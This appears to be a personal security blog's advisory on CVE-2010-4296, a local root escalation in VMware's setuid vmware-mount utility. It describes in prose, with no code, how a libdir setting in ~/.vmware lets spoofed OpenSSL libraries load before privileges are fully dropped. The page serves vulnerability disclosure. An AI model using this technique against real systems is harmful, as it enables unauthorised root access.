martin carpenter

contents

most popular
2012/05/05, updated 2012/12/15
ubuntu unity lens for vim
2010/04/14
ckwtmpx

vmware vmware-mount vulnerability

2010/12/02

tags: linux vmware vmware-mount vulnerability CVE-2010-4296

summary

Attack on the shared library loading mechanism in setuid root vmware-mount utility enables local attacker to gain root privilege. Affects VMWare Workstation 6.5, 7 and VMWare Fusion 2.0, 3.0.

details

vmware-mount is a setuid root utility shipped with some number of VMware products. It reads a user configuration file ~/.vmware. In that file one can configure a libdir parameter from which shared objects are loaded (dlopen()ed). In particular vmware-mount tries to load the OpenSSL libraries (libssl.so, libcrypto.so) by first searching the libdir directory and then calling functions defined in these libraries (eg SSL_library_init()). Privileges have not been completely dropped at this point (saved UID is zero) so it is trivial to generate spoof shared objects from the list of exported function symbols in the legitimate libraries. Running vmware-mount with any two (even invalid) arguments is enough to then gain root.

timeline

advisories